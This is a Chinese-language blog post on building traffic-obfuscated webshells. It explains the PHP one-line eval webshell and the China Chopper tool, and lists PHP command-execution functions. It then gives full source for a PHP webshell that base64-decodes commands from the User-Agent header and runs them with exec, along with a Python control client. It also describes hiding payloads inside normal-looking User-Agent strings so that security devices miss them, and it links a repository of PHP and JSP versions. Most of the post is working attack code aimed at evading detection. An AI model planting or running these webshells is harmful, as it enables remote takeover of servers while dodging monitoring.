

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/f1.png">
  <link rel="icon" type="image/png" href="/img/f1.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="YLL">
  <meta name="keywords" content="">
  <title>流量混淆webshell - YLL-F11</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>YLL-F1</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-08-06 14:49" pubdate>
        2020年8月6日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      15
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">流量混淆webshell</h1>
            
            <div class="markdown-body" id="post-body">
              <h2 id="webshell是什么？"><a href="#webshell是什么？" class="headerlink" title="webshell是什么？"></a>webshell是什么？</h2><p>刚刚接触安全的时候，对于webshell这个概念还是十分的惊奇。只记得当时带课的老师才测试网站上传了一个php文件（老师说是webshell），然后用了一个软件就直接可以控制测试网站了。当时觉的真TM的牛皮，那时起觉的安全还挺有意思的。  </p>
<h3 id="回忆复现"><a href="#回忆复现" class="headerlink" title="回忆复现"></a>回忆复现</h3><p><font size=1 color=Blue><em>到底websehll是什么？那就来回忆下当前的情景。</em></font><br>工具: phpstudy、菜刀、一句话webshell<code>&lt;?php eval(@$_POST[&#39;a&#39;]); ?&gt;</code>。<br>操作流程:    </p>
<ul>
<li>将webshell保存为后缀为.php的文件并上传到相应的web目录下。  </li>
</ul>
<p><img src="/images/2020-8-6/yijuhua.png" srcset="/img/loading.gif"></p>
<ul>
<li>使用中国菜刀进行连接  </li>
</ul>
<blockquote>
<p>中国菜刀 是一款由中国大牛开发的webshell后门管理工具。配置简便、功能强大、使用方便，可以说是一款强大好用的“web管理工具”。   </p>
</blockquote>
<p><img src="/images/2020-8-6/caidao_config.png" srcset="/img/loading.gif"></p>
<p><img src="/images/2020-8-6/caidao.png" srcset="/img/loading.gif"></p>
<h3 id="菜刀分析"><a href="#菜刀分析" class="headerlink" title="菜刀分析"></a>菜刀分析</h3><ul>
<li>在菜刀客户端中输入ipconfig命令，然后通过winshark抓包分析菜刀运行的原理。  </li>
</ul>
<p><img src="/images/2020-8-6/ipconfig.png" srcset="/img/loading.gif">  </p>
<p><img src="/images/2020-8-6/caidao_pcap.png" srcset="/img/loading.gif">  </p>
<ul>
<li>菜刀将执行的命令通过base64加密传入webshell中，对psot字段进行base64解密看看其详情信息<a target="_blank" rel="noopener" href="https://blog.csdn.net/gscaiyucheng/article/details/24911375">(菜刀分析参加文章)</a>。  </li>
</ul>
<p><img src="/images/2020-8-6/base64.png" srcset="/img/loading.gif">  </p>
<ol>
<li><p>@ini_set(“display_errors”,”0”);临时关闭PHP的错误显示功能</p>
</li>
<li><p>@set_time_limit(0);防止像dir、上传文件大马时超时</p>
</li>
<li><p>@set_magic_quotes_runtime(0);关闭魔术引号，这东西在4.0以后就不怎么用了</p>
</li>
<li><p>$p=’cmd’;执行cmd</p>
</li>
<li><p>$s=’cd /d D:\&amp;ipconfig&echo;执行ipconfg并输出</p>
</li>
</ol>
<h3 id="一句话分析"><a href="#一句话分析" class="headerlink" title="一句话分析"></a>一句话分析</h3><p><code>&lt;?php eval(@$_POST[&#39;a&#39;]); ?&gt;</code><br>为什么如此简单的一句话就可以拥有如此神奇的力量，让他足以控制一台计算机。其实是计算机语言的魅力，每一种计算机语言都是为操作计算机系统而生。当然webshell也是计算机语言所写，其又被称为服务器控制端，那如过被攻击者利用就被称之为shell了。  </p>
<ul>
<li><p>以php语言为案例，攻击者通过各种函数、变量拼接，从而构造出命令执行函数，php 常见命令执行函数: </p>
<pre><code class="hljs aidl">$&#123;&#125;
Eval()
Assert()
preg_replace()
create_function()
array_map()
call_user_func()&#x2F;call_user_func_array()
array_filter()
usort(),uasort()</code></pre></li>
<li><p>通过post传入payload执行命令并回显<br><img src="/images/2020-8-6/post.png" srcset="/img/loading.gif">  </p>
</li>
<li><p>winshark抓包<br><img src="/images/2020-8-6/post_pcap.png" srcset="/img/loading.gif">  </p>
</li>
</ul>
<p>相信看到这一步应该对webshell有一个大概的了解，简单理解了webshell的执行原理。</p>
<h2 id="流量加密"><a href="#流量加密" class="headerlink" title="流量加密"></a>流量加密</h2><p>目前市场上的安全设备对于恶意数据流都可精准检测其特征，而常规的一句话木马、菜刀等特征过于明显。而且大部分的黑客工具都被列入特征库，所以攻击方的攻击手法很容易被针对，攻击链路也很容易被还原。</p>
<h3 id="简单加密"><a href="#简单加密" class="headerlink" title="简单加密"></a>简单加密</h3><p>常规的webshell是将所需的payload通过post进行传参，很容易被流量设备检测。当然，你也可以使用其他地方进行传参。</p>
<ul>
<li>例如：user_agent加密进行传参，然后再解密执行命令。   </li>
</ul>
<p><img src="/images/2020-8-6/post_encrypt.png" srcset="/img/loading.gif">  </p>
<ul>
<li>winshark抓包  </li>
</ul>
<p><img src="/images/2020-8-6/post_encrypt_pcap.png" srcset="/img/loading.gif">   </p>
<h3 id="webshell源码"><a href="#webshell源码" class="headerlink" title="webshell源码"></a>webshell源码</h3><pre><code class="hljs aidl">&lt;?php
$dd &#x3D; $_SERVER[&#39;HTTP_USER_AGENT’];
&#x2F;&#x2F;获取user_agent参数
$qq &#x3D; base64_decode($dd);
&#x2F;&#x2F;解密user_agent参数
$jjj &#x3D; exec ($qq,$out);
&#x2F;&#x2F;执行user_agent参数
for ($i&#x3D;0 ;$i &lt; count($out) ;$i++)&#123;
    $ls &#x3D; $ls.$out[$i].&quot;\n&quot;;
&#125;
echo base64_encode($ls);
&#x2F;&#x2F;加密输入执行后的系统命令
?&gt;</code></pre>
<h3 id="客户端源码"><a href="#客户端源码" class="headerlink" title="客户端源码"></a>客户端源码</h3><p>当然用浏览器手工去输入shell着实不太方便，写一个简单的控制脚本。</p>
<pre><code class="hljs aidl">#!&#x2F;usr&#x2F;bin&#x2F;python
# -*- coding: UTF-8 -*-
import requests
import base64
str_1 &#x3D; &quot;&quot;
headers &#x3D; &#123;
        &quot;Accept-Language&quot;: &quot;zh-CN,zh;q&#x3D;0.9,en;q&#x3D;0.8&quot;,
        &quot;User-Agent&quot;: &quot;adwd&quot;,
        &quot;Accept&quot;:&quot;text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,*&#x2F;*;q&#x3D;0.8&quot;,
        &quot;Accept-Language&quot;:&quot;zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2&quot;,
        &quot;Accept-Encoding&quot;:&quot;gzip, deflate&quot;
    &#125;
while True:
    str_1 &#x3D; input(&quot;please input cmd:&quot;)
    str_1 &#x3D; bytes(str_1, encoding&#x3D;&quot;gbk&quot;)
    str_1 &#x3D; base64.b64encode(str_1)
    headers[&#39;User-Agent&#39;]&#x3D;str_1
    ls &#x3D; requests.get(url&#x3D;&quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;1.php&quot;,headers&#x3D;headers)#url更改位置
    ls_1 &#x3D; ls.content
    ls_1 &#x3D; base64.b64decode(ls_1)
    ls_2 &#x3D; str (ls_1, encoding&#x3D;&quot;gbk&quot;)
    print (ls_2)</code></pre>
<h2 id="流量混淆"><a href="#流量混淆" class="headerlink" title="流量混淆"></a>流量混淆</h2><p>上面的加密user_agent的特征还是较为明显。新思路:客户端将所需的payload通过base64加密进行拆分，嵌入正常的user_agent中，然后传入服务器。Webshell再从user_agent中提取payload解密执行，将回显命令通过base64+assic移位进行加密输出。客户端再对加密回显进行解密。 </p>
<h3 id="使用详情"><a href="#使用详情" class="headerlink" title="使用详情"></a>使用详情</h3><p>通过上面思路，分别编写了php与jsp的webshell，还有python客户端。当然目前并不支持文件上传，和其他高级功能，后续再持续更新。<br><a target="_blank" rel="noopener" href="https://github.com/YLL-F1/--jsp-php">源码下载</a><br><img src="/images/2020-8-6/complete.png" srcset="/img/loading.gif">  </p>
<p><img src="/images/2020-8-6/complete_pcap.png" srcset="/img/loading.gif">  </p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web%E5%AE%89%E5%85%A8/">web安全</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/08/11/%E5%9C%9F%E8%B1%86%E7%89%9B%E8%85%A9/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">土豆牛腩</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/05/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/">
                        <span class="hidden-mobile">hexo博客搭建</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <script type="text/javascript">
    function loadUtterances() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'YLL-F1/commit');
      s.setAttribute('issue-term', 'pathname');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    }
    waitElementVisible('comments', loadUtterances)
  </script>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
  <script>
    	var _mtac = {"senseQuery":1};
    	(function() {
    		var mta = document.createElement("script");
    		mta.src = "//pingjs.qq.com/h5/stats.js?v2.0.4";
    		mta.setAttribute("name", "MTAH5");
    		mta.setAttribute("sid", "500732067");
    		mta.setAttribute("cid", "500732072");
    		var s = document.getElementsByTagName("script")[0];
    		s.parentNode.insertBefore(mta, s);
    	})();
  </script>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "流量混淆webshell&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>















</body>
</html>
